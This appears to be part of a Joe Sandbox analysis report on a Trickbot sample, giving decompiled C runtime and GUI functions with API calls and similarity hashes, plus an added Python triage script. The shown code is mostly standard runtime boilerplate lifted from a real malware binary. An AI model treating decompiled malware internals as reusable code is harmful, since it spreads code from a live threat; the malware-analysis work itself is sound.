                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: File$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $j/@
                          • API String ID: 3784150691-390610925
                          • Opcode ID: 5aec98df34ffba037991e979872b23b4052796262f7dcc7c2ef97e69001ed7de
                          • Instruction ID: 58891faf1d1ba7203e44f1e9e6a3bea50605c19b83389c9ee2f96a6d78c0c943
                          • Opcode Fuzzy Hash: 5aec98df34ffba037991e979872b23b4052796262f7dcc7c2ef97e69001ed7de
                          • Instruction Fuzzy Hash: 4D31D472A00209AEDF20EB61CC46F9A376CEF45704F10047BF540F61C2E6B9AD418B5E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E0041A495(void* __ebx, void* __ecx, signed int _a4, long _a8) {
                          				struct HWND__* _v8;
                          				void* __ebp;
                          				void* _t14;
                          				void* _t17;
                          				void* _t18;
                          				void* _t28;
                          				struct HWND__* _t29;
                          				signed int _t33;
                          				void* _t36;
                          				void* _t40;
                          				void* _t43;
                          
                          				_t28 = __ebx;
                          				_push(__ecx);
                          				_t36 = __ecx;
                          				_t40 = E00419DFD(__ecx);
                          				_t33 = _a4 & 0x0000fff0;
                          				_t14 = _t33 - 0xf040;
                          				if(_t14 == 0) {
                          					L12:
                          					if(_a8 != 0x75 || _t40 == 0) {
                          						L15:
                          						goto L16;
                          					} else {
                          						E0041B83C(_t40);
                          						L11:
                          						_push(1);
                          						_pop(0);
                          						L16:
                          						return 0;
                          					}
                          				}
                          				_t17 = _t14 - 0x10;
                          				if(_t17 == 0) {
                          					goto L12;
                          				}
                          				_t18 = _t17 - 0x10;
                          				if(_t18 == 0 || _t18 == 0xa0) {
                          					if(_t33 == 0xf060 || _a8 != 0) {
                          						if(_t40 != 0) {
                          							_push(_t28);
                          							_t29 =  *(_t36 + 0x1c);
                          							_v8 = GetFocus();
                          							E0041884D(_t43, SetActiveWindow( *(_t40 + 0x1c)));
                          							SendMessageA( *(_t40 + 0x1c), 0x112, _a4, _a8);
                          							if(IsWindow(_t29) != 0) {
                          								SetActiveWindow(_t29);
                          							}
                          							if(IsWindow(_v8) != 0) {
                          								SetFocus(_v8);
                          							}
                          						}
                          					}
                          					goto L11;
                          				} else {
                          					goto L15;
                          				}
                          			}


                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$ActiveFocus$MessageSend
                          • String ID: u
                          • API String ID: 1556911595-4067256894
                          • Opcode ID: 2818d96287be1a4e6744b06c25580ec2b11bdce5580c43ee3e89ac182c6ab261
                          • Instruction ID: ae1f678ee06cd1afa2dde316f473f01efa023dce23f25be664f04c55ef8a1cbc
                          • Opcode Fuzzy Hash: 2818d96287be1a4e6744b06c25580ec2b11bdce5580c43ee3e89ac182c6ab261
                          • Instruction Fuzzy Hash: 6711D632506205BBDF316F79DE089EB7A66DF44710F04813BE901926A1D67CCDE0DA5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041CADB(intOrPtr __ecx, short _a4) {
                          				intOrPtr _v8;
                          				char _v40;
                          				void _v68;
                          				void* _t11;
                          				signed int _t15;
                          				int _t20;
                          				char* _t24;
                          				struct HDC__* _t26;
                          
                          				_v8 = __ecx;
                          				_t20 = 0xa;
                          				_t24 = "System";
                          				_t11 = GetStockObject(0x11);
                          				if(_t11 != 0) {
                          					L2:
                          					if(GetObjectA(_t11, 0x3c,  &_v68) != 0) {
                          						_t24 =  &_v40;
                          						_t26 = GetDC(0);
                          						_t15 = _v68;
                          						if(_t15 < 0) {
                          							_v68 =  ~_t15;
                          						}
                          						_t20 = MulDiv(_v68, 0x48, GetDeviceCaps(_t26, 0x5a));
                          						ReleaseDC(0, _t26);
                          					}
                          					L6:
                          					if(_a4 == 0) {
                          						_a4 = _t20;
                          					}
                          					return E0041C9C1(_v8, _t24, _a4);
                          				}
                          				_t11 = GetStockObject(0xd);
                          				if(_t11 == 0) {
                          					goto L6;
                          				}
                          				goto L2;
                          			}


                          APIs
                          • GetStockObject.GDI32(00000011), ref: 0041CAF7
                          • GetStockObject.GDI32(0000000D), ref: 0041CAFF
                          • GetObjectA.GDI32(00000000,0000003C,?), ref: 0041CB0C
                          • GetDC.USER32(00000000), ref: 0041CB1B
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041CB32
                          • MulDiv.KERNEL32(?,00000048,00000000), ref: 0041CB3E
                          • ReleaseDC.USER32(00000000,00000000), ref: 0041CB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Object$Stock$CapsDeviceRelease
                          • String ID: System
                          • API String ID: 46613423-3470857405
                          • Opcode ID: 3da9e1d72f07c621294702195d3c1c7fd9c413acf046fb248f006cac22c4412e
                          • Instruction ID: 6e3725e3afaea2b5f42bfef380bc7a1900b360e8316c24ab246933eb3b64c65f
                          • Opcode Fuzzy Hash: 3da9e1d72f07c621294702195d3c1c7fd9c413acf046fb248f006cac22c4412e
                          • Instruction Fuzzy Hash: D0115A71A44218BBEB109B95DC49FEE7B78EB15741F004025F605E72C0D7B4AD41CB69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                          			// Matches the MSVC C runtime's __crtMessageBoxA: user32.dll is loaded lazily and
                          			// MessageBoxA, GetActiveWindow and GetLastActivePopup are resolved by name so the CRT can
                          			// report fatal errors without a static user32 import. *0x44ba40/*0x44ba44/*0x44ba48 cache
                          			// the three pointers. The LoadLibraryA/GetProcAddress pair here is runtime boilerplate,
                          			// not a malicious dynamic-import resolver, and should not be scored as evasion on its own.
                          			E0040B897(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				intOrPtr* _t4;
                          				intOrPtr* _t7;
                          				_Unknown_base(*)()* _t11;
                          				void* _t14;
                          				struct HINSTANCE__* _t15;
                          				void* _t17;
                          
                          				_t14 = 0;
                          				_t17 =  *0x44ba40 - _t14; // 0x0
                          				if(_t17 != 0) {
                          					L4:
                          					_t4 =  *0x44ba44; // 0x0
                          					if(_t4 != 0) {
                          						_t14 =  *_t4();
                          						if(_t14 != 0) {
                          							_t7 =  *0x44ba48; // 0x0
                          							if(_t7 != 0) {
                          								_t14 =  *_t7(_t14);
                          							}
                          						}
                          					}
                          					return  *0x44ba40(_t14, _a4, _a8, _a12);
                          				}
                          				_t15 = LoadLibraryA("user32.dll");
                          				if(_t15 == 0) {
                          					L10:
                          					return 0;
                          				}
                          				_t11 = GetProcAddress(_t15, "MessageBoxA");
                          				 *0x44ba40 = _t11;
                          				if(_t11 == 0) {
                          					goto L10;
                          				} else {
                          					 *0x44ba44 = GetProcAddress(_t15, "GetActiveWindow");
                          					 *0x44ba48 = GetProcAddress(_t15, "GetLastActivePopup");
                          					goto L4;
                          				}
                          			}
                          Instruction address gutter (per-line alignment lost in extraction): 0x0040b898 to 0x0040b91c

                          APIs
                          • LoadLibraryA.KERNEL32(user32.dll), ref: 0040B8A9
                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040B8C1
                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040B8D2
                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040B8DF
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                          • API String ID: 2238633743-4044615076
                          • Opcode ID: d949d3465b574957603304a922c04e9659560606c5952c762aaf0f580d181137
                          • Instruction ID: 3b4fae0b7554c2901090a9ffbb2c434fd57c457b19a738776c202a3d2233c071
                          • Opcode Fuzzy Hash: d949d3465b574957603304a922c04e9659560606c5952c762aaf0f580d181137
                          • Instruction Fuzzy Hash: 89018475700205AFC7209FB59CC5A2B3BE8EB9D740705043BF601E2AA1DB78C801ABED
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			// Matches the MSVC C runtime's __crtCompareStringA (aw_cmp.c). *0x44bad8 remembers whether
                          			// CompareStringW (1) or CompareStringA (2) works on this OS, each probed once with a
                          			// one-NUL string of length 1 (0x43e9dc / 0x43e9d8); *0x44b970 is the default code page used
                          			// when _a28 is 0. Flag 9 = MB_PRECOMPOSED|MB_ERR_INVALID_CHARS, E0040995E counts bytes up to
                          			// the first NUL (strncnt), E00405B80 is the stack probe behind _alloca, and the GetCPInfo
                          			// path handles a lone lead byte. Results 1/2/3 are CSTR_LESS_THAN/CSTR_EQUAL/
                          			// CSTR_GREATER_THAN; 0 means failure. The [fs:0x0] writes are the SEH frame, not hooking.
                          			E0040D42D(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
                          				signed int _v8;
                          				intOrPtr _v20;
                          				short* _v28;
                          				int _v32;
                          				int _v36;
                          				short* _v40;
                          				short* _v44;
                          				char _v58;
                          				struct _cpinfo _v64;
                          				void* _v80;
                          				int _t65;
                          				int _t66;
                          				int _t69;
                          				intOrPtr* _t82;
                          				intOrPtr* _t84;
                          				int _t86;
                          				int _t87;
                          				int _t88;
                          				void* _t96;
                          				char _t99;
                          				char _t101;
                          				intOrPtr _t104;
                          				intOrPtr _t105;
                          				int _t107;
                          				short* _t109;
                          				int _t111;
                          				int _t114;
                          				intOrPtr _t115;
                          				short* _t116;
                          				int _t118;
                          
                          				_push(0xffffffff);
                          				_push(0x43eb20);
                          				_push(E004070AC);
                          				_push( *[fs:0x0]);
                          				 *[fs:0x0] = _t115;
                          				_t116 = _t115 - 0x30;
                          				_v28 = _t116;
                          				_t118 =  *0x44bad8; // 0x0
                          				_t107 = 1;
                          				if(_t118 != 0) {
                          					L5:
                          					_t111 = _a16;
                          					if(_t111 > 0) {
                          						_t88 = E0040995E(_a12, _t111);
                          						_pop(_t96);
                          						_t111 = _t88;
                          						_a16 = _t111;
                          					}
                          					if(_a24 > 0) {
                          						_t87 = E0040995E(_a20, _a24);
                          						_pop(_t96);
                          						_a24 = _t87;
                          					}
                          					_t65 =  *0x44bad8; // 0x0
                          					if(_t65 != 2) {
                          						if(_t65 != _t107) {
                          							goto L48;
                          						} else {
                          							if(_a28 == 0) {
                          								_t86 =  *0x44b970; // 0x0
                          								_a28 = _t86;
                          							}
                          							if(_t111 == 0 || _a24 == 0) {
                          								if(_t111 != _a24) {
                          									if(_a24 <= _t107) {
                          										if(_t111 > _t107) {
                          											L30:
                          											_push(3);
                          											goto L18;
                          										} else {
                          											if(GetCPInfo(_a28,  &_v64) == 0) {
                          												goto L48;
                          											} else {
                          												if(_t111 <= 0) {
                          													if(_a24 <= 0) {
                          														goto L39;
                          													} else {
                          														if(_v64 >= 2) {
                          															_t82 =  &_v58;
                          															if(_v58 != 0) {
                          																while(1) {
                          																	_t104 =  *((intOrPtr*)(_t82 + 1));
                          																	if(_t104 == 0) {
                          																		goto L20;
                          																	}
                          																	_t99 =  *_a20;
                          																	if(_t99 <  *_t82 || _t99 > _t104) {
                          																		_t82 = _t82 + 2;
                          																		if( *_t82 != 0) {
                          																			continue;
                          																		} else {
                          																			goto L20;
                          																		}
                          																	} else {
                          																		goto L17;
                          																	}
                          																	goto L49;
                          																}
                          															}
                          														}
                          														goto L20;
                          													}
                          												} else {
                          													if(_v64 >= 2) {
                          														_t84 =  &_v58;
                          														if(_v58 != 0) {
                          															while(1) {
                          																_t105 =  *((intOrPtr*)(_t84 + 1));
                          																if(_t105 == 0) {
                          																	goto L30;
                          																}
                          																_t101 =  *_a12;
                          																if(_t101 <  *_t84 || _t101 > _t105) {
                          																	_t84 = _t84 + 2;
                          																	if( *_t84 != 0) {
                          																		continue;
                          																	} else {
                          																		goto L30;
                          																	}
                          																} else {
                          																	goto L17;
                          																}
                          																goto L50;
                          															}
                          														}
                          													}
                          													goto L30;
                          													L50:
                          												}
                          											}
                          										}
                          									} else {
                          										L20:
                          										_t66 = _t107;
                          									}
                          								} else {
                          									L17:
                          									_push(2);
                          									L18:
                          									_pop(_t66);
                          								}
                          							} else {
                          								L39:
                          								_t69 = MultiByteToWideChar(_a28, 9, _a12, _t111, 0, 0);
                          								_v32 = _t69;
                          								if(_t69 == 0) {
                          									goto L48;
                          								} else {
                          									_v8 = 0;
                          									E00405B80(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
                          									_v28 = _t116;
                          									_v40 = _t116;
                          									_v8 = _v8 | 0xffffffff;
                          									if(_v40 == 0 || MultiByteToWideChar(_a28, _t107, _a12, _t111, _v40, _v32) == 0) {
                          										goto L48;
                          									} else {
                          										_t114 = MultiByteToWideChar(_a28, 9, _a20, _a24, 0, 0);
                          										_v36 = _t114;
                          										if(_t114 == 0) {
                          											goto L48;
                          										} else {
                          											_v8 = _t107;
                          											E00405B80(_t114 + _t114 + 0x00000003 & 0x000000fc, _t96);
                          											_v28 = _t116;
                          											_t109 = _t116;
                          											_v44 = _t109;
                          											_v8 = _v8 | 0xffffffff;
                          											if(_t109 == 0 || MultiByteToWideChar(_a28, 1, _a20, _a24, _t109, _t114) == 0) {
                          												goto L48;
                          											} else {
                          												_t66 = CompareStringW(_a4, _a8, _v40, _v32, _t109, _t114);
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          					} else {
                          						_t66 = CompareStringA(_a4, _a8, _a12, _t111, _a20, _a24);
                          					}
                          				} else {
                          					if(CompareStringW(0, 0, 0x43e9dc, _t107, 0x43e9dc, _t107) == 0) {
                          						if(CompareStringA(0, 0, 0x43e9d8, _t107, 0x43e9d8, _t107) == 0) {
                          							L48:
                          							_t66 = 0;
                          						} else {
                          							 *0x44bad8 = 2;
                          							goto L5;
                          						}
                          					} else {
                          						 *0x44bad8 = _t107;
                          						goto L5;
                          					}
                          				}
                          				L49:
                          				 *[fs:0x0] = _v20;
                          				return _t66;
                          				goto L50;
                          			}
                          Instruction address gutter (per-line alignment lost in extraction): 0x0040d430 to 0x0040d6a9

                          APIs
                          • CompareStringW.KERNEL32(00000000,00000000,0043E9DC,00000001,0043E9DC,00000001,00000000,01230E4C,?), ref: 0040D46B
                          • CompareStringA.KERNEL32(00000000,00000000,0043E9D8,00000001,0043E9D8,00000001), ref: 0040D488
                          • CompareStringA.KERNEL32(?,?,00000000,?,?,?,00000000,01230E4C,?), ref: 0040D4E6
                          • GetCPInfo.KERNEL32(?,00000000,00000000,01230E4C,?), ref: 0040D537
                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000), ref: 0040D5B6
                          • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,?), ref: 0040D617
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0040D62A
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0040D676
                          • CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 0040D68E
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ByteCharCompareMultiStringWide$Info
                          • String ID:
                          • API String ID: 1651298574-0
                          • Opcode ID: 3057979ef30cf42b864163462c61933065c5e0aeb3ba1c590f46783760f614c3
                          • Instruction ID: 4887ad1cf9c46c076eba65355ef0af9a9b4a3695540afda8ff8e194e80ccaebf
                          • Opcode Fuzzy Hash: 3057979ef30cf42b864163462c61933065c5e0aeb3ba1c590f46783760f614c3
                          • Instruction Fuzzy Hash: F2718971D00249BBCF219F949C41AEF7BB9EB09358F14043AF914B22A0D23A9C59DB99
                          Uniqueness

                          Uniqueness Score: -1.00%
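                          The runtime helpers decompiled here, E0040B897 (__crtMessageBoxA) and E0040D42D (__crtCompareStringA) above and E0040973A (__crtLCMapStringA) in the next block, are statically linked MSVC C runtime code that any report on a CRT-linked binary will contain, and the report's Similarity fields (API ID, String ID and the combined API String ID) are address-independent keys for recognizing them. The parser below is an added triage example, not part of the Joe Sandbox report and not Joe Sandbox or Trickbot code: it reads the "C-Code"/"APIs"/"Similarity" blocks in the layout shown on this page, separates functions whose API String ID is on an analyst allowlist from those that still need review, and lists the exports a function resolves through GetProcAddress, which is how the E0040B897 stub would otherwise trip a generic dynamic-import heuristic. The `FunctionRecord` structure, the allowlist and the sample text (excerpted from the two blocks above) are constructed for this example; the allowlist is deliberately incomplete so that E0040D42D falls through to review.

```python
"""Triage helper for Joe Sandbox 'C-Code' blocks: parse each function's APIs and
Similarity fields, then drop functions whose API String ID is a known runtime helper.
Added example, not Joe Sandbox or Trickbot code; allowlist and sample are constructed."""
import re
from dataclasses import dataclass, field

# Function header as the decompiler prints it: E<addr>(args) {   (body calls end in ';')
HEADER_RE = re.compile(r"^\s*(E[0-9A-F]{8})\(.*\)\s*\{\s*$")
# One 'APIs' bullet: Name.MODULE(args), ref: <address>
API_RE = re.compile(r"^\s*•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-F]+)\s*$")
# The three Similarity fields used as keys (String ID may be empty)
FIELD_RE = re.compile(r"^\s*•\s*(API ID|String ID|API String ID):\s*(.*)$")


@dataclass
class FunctionRecord:
    name: str
    apis: list = field(default_factory=list)  # (api, module, args, ref) per 'APIs' line
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""

    def dynamic_imports(self):
        """Export names passed to GetProcAddress, i.e. APIs resolved at run time."""
        return [args.split(",")[-1].strip()
                for api, _mod, args, _ref in self.apis if api == "GetProcAddress"]


def parse_blocks(text):
    """One FunctionRecord per decompiled function, filled from the lines that follow it."""
    records, cur = [], None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            cur = FunctionRecord(m.group(1))
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append(m.groups())
            continue
        m = FIELD_RE.match(line)
        if m:
            setattr(cur, m.group(1).lower().replace(" ", "_"), m.group(2).strip())
    return records


def triage(records, allowlist):
    """Split records into (known runtime helpers, functions still needing review)."""
    known, review = [], []
    for rec in records:
        label = allowlist.get(rec.api_string_id)
        (known if label else review).append((rec.name, label or rec.api_id))
    return known, review


# Constructed allowlist: API String ID -> analyst label. One entry only, so the
# second sample function deliberately falls through to review.
KNOWN_RUNTIME = {"2238633743-4044615076": "__crtMessageBoxA (MSVC CRT user32 lazy-load stub)"}

# Constructed sample input: excerpt of two blocks from the report above.
SAMPLE_REPORT = """\
C-Code - Quality: 46%
\t\t\tE0040B897(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
\t\t\t\t_t15 = LoadLibraryA("user32.dll");
\t\t\t}
APIs
• LoadLibraryA.KERNEL32(user32.dll), ref: 0040B8A9
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040B8C1
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040B8D2
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040B8DF
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
• API String ID: 2238633743-4044615076
C-Code - Quality: 86%
\t\t\tE0040D42D(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
\t\t\t\tE00405B80(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
\t\t\t}
APIs
• CompareStringW.KERNEL32(00000000,00000000,0043E9DC,00000001,0043E9DC,00000001,00000000,01230E4C,?), ref: 0040D46B
• CompareStringA.KERNEL32(00000000,00000000,0043E9D8,00000001,0043E9D8,00000001), ref: 0040D488
• GetCPInfo.KERNEL32(?,00000000,00000000,01230E4C,?), ref: 0040D537
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000), ref: 0040D5B6
Similarity
• API ID: ByteCharCompareMultiStringWide$Info
• String ID:
• API String ID: 1651298574-0
"""

RECORDS = parse_blocks(SAMPLE_REPORT)

if __name__ == "__main__":
    known, review = triage(RECORDS, KNOWN_RUNTIME)
    for name, label in known:
        print(f"skip   {name}: {label}")
    for name, api_id in review:
        print(f"review {name}: {api_id}")
    for rec in RECORDS:
        if rec.dynamic_imports():
            print(f"       {rec.name} resolves at run time: {', '.join(rec.dynamic_imports())}")
```

                          Run as a script it prints E0040B897 as skipped and E0040D42D as needing review, plus the three user32 exports the stub resolves. The API String ID combines the API ID and String ID rather than any address (the empty String ID of E0040D42D is consistent with its trailing -0), so an allowlist keyed on it carries over between reports of differently laid-out samples; once E0040D42D is confirmed as __crtCompareStringA its key 1651298574-0 belongs in the allowlist too.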

                          C-Code - Quality: 61%
                          			// Matches the MSVC C runtime's __crtLCMapStringA (aw_map.c). *0x44b94c caches whether
                          			// LCMapStringW (1) or LCMapStringA (2) is usable, probed once with LCMAP_UPPERCASE (0x100).
                          			// _a32 (bError) selects MB_PRECOMPOSED|MB_ERR_INVALID_CHARS (9) or MB_PRECOMPOSED (1); the
                          			// "sbb eax, eax" idiom is what the decompiler renders as (~_a32 & 8) + 1, which is not a
                          			// literal reading. _a9 & 4 tests LCMAP_SORTKEY (0x400) in the dwMapFlags high byte: sort
                          			// keys are returned as bytes directly, other results go back through WideCharToMultiByte
                          			// with 0x220 = WC_COMPOSITECHECK|WC_SEPCHARS. Same stack-probe (E00405B80) and SEH frame
                          			// pattern as E0040D42D; runtime code, not sample-specific logic.
                          			E0040973A(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
                          				signed int _v8;
                          				intOrPtr _v20;
                          				short* _v28;
                          				int _v32;
                          				short* _v36;
                          				short* _v40;
                          				int _v44;
                          				void* _v60;
                          				int _t61;
                          				int _t62;
                          				int _t82;
                          				int _t83;
                          				int _t88;
                          				short* _t89;
                          				int _t90;
                          				void* _t91;
                          				int _t99;
                          				intOrPtr _t101;
                          				short* _t102;
                          				int _t104;
                          
                          				_push(0xffffffff);
                          				_push(0x43e9e0);
                          				_push(E004070AC);
                          				_push( *[fs:0x0]);
                          				 *[fs:0x0] = _t101;
                          				_t102 = _t101 - 0x1c;
                          				_v28 = _t102;
                          				_t104 =  *0x44b94c; // 0x1
                          				if(_t104 != 0) {
                          					L5:
                          					if(_a16 > 0) {
                          						_t83 = E0040995E(_a12, _a16);
                          						_pop(_t91);
                          						_a16 = _t83;
                          					}
                          					_t61 =  *0x44b94c; // 0x1
                          					if(_t61 != 2) {
                          						if(_t61 != 1) {
                          							goto L21;
                          						} else {
                          							if(_a28 == 0) {
                          								_t82 =  *0x44b970; // 0x0
                          								_a28 = _t82;
                          							}
                          							asm("sbb eax, eax");
                          							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
                          							_v32 = _t88;
                          							if(_t88 == 0) {
                          								goto L21;
                          							} else {
                          								_v8 = 0;
                          								E00405B80(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
                          								_v28 = _t102;
                          								_v40 = _t102;
                          								_v8 = _v8 | 0xffffffff;
                          								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
                          									goto L21;
                          								} else {
                          									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
                          									_v44 = _t99;
                          									if(_t99 == 0) {
                          										goto L21;
                          									} else {
                          										if((_a9 & 0x00000004) == 0) {
                          											_v8 = 1;
                          											E00405B80(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
                          											_v28 = _t102;
                          											_t89 = _t102;
                          											_v36 = _t89;
                          											_v8 = _v8 | 0xffffffff;
                          											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
                          												goto L21;
                          											} else {
                          												_push(0);
                          												_push(0);
                          												if(_a24 != 0) {
                          													_push(_a24);
                          													_push(_a20);
                          												} else {
                          													_push(0);
                          													_push(0);
                          												}
                          												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
                          												if(_t99 == 0) {
                          													goto L21;
                          												} else {
                          													goto L30;
                          												}
                          											}
                          										} else {
                          											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
                          												L30:
                          												_t62 = _t99;
                          											} else {
                          												goto L21;
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          					} else {
                          						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                          					}
                          				} else {
                          					_push(0);
                          					_push(0);
                          					_t90 = 1;
                          					if(LCMapStringW(0, 0x100, 0x43e9dc, _t90, ??, ??) == 0) {
                          						if(LCMapStringA(0, 0x100, 0x43e9d8, _t90, 0, 0) == 0) {
                          							L21:
                          							_t62 = 0;
                          						} else {
                          							 *0x44b94c = 2;
                          							goto L5;
                          						}
                          					} else {
                          						 *0x44b94c = _t90;
                          						goto L5;
                          					}
                          				}
                          				 *[fs:0x0] = _v20;
                          				return _t62;
                          			}
                          0x0040973d 0x0040973f 0x00409744 0x0040974f 0x00409750 0x00409757 0x0040975d 0x00409762 0x00409768 0x004097b0 0x004097b3 0x004097bb 0x004097c1 0x004097c2 0x004097c2 0x004097c5 0x004097cd 0x004097ef 0x00000000 0x004097f5 0x004097f8 0x004097fa 0x004097ff 0x004097ff 0x0040980f 0x0040981f 0x00409821 0x00409826 0x00000000 0x0040982c 0x0040982c 0x00409837 0x0040983c 0x00409841 0x00409844 0x00409860 0x00000000 0x0040987b 0x0040988d 0x0040988f 0x00409894 0x00000000 0x00409896 0x0040989a 0x004098dc 0x004098eb 0x004098f0 0x004098f3 0x004098f5 0x004098f8 0x00409912 0x00000000 0x0040992c 0x0040992f 0x00409930 0x00409931 0x00409937 0x0040993a 0x00409933 0x00409933 0x00409934 0x00409934 0x0040994d 0x00409951 0x00000000 0x00000000 0x00000000 0x00000000 0x00409951 0x0040989c 0x0040989f 0x00409957 0x00409957 0x00000000 0x00000000 0x00000000 0x0040989f 0x0040989a 0x00409894 0x00409860 0x00409826 0x004097cf 0x004097e1 0x004097e1 0x0040976a 0x0040976a 0x0040976b 0x0040976e 0x00409784 0x004097a0 0x004098c8 0x004098c8 0x004097a6 0x004097a6 0x00000000 0x004097a6 0x00409786 0x00409786 0x00000000 0x00409786 0x00409784 0x004098d0 0x004098db

                          APIs
                          • LCMapStringW.KERNEL32(00000000,00000100,0043E9DC,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0040977C
                          • LCMapStringA.KERNEL32(00000000,00000100,0043E9D8,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409798
                          • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 004097E1
                          • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409819
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409871
                          • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409887
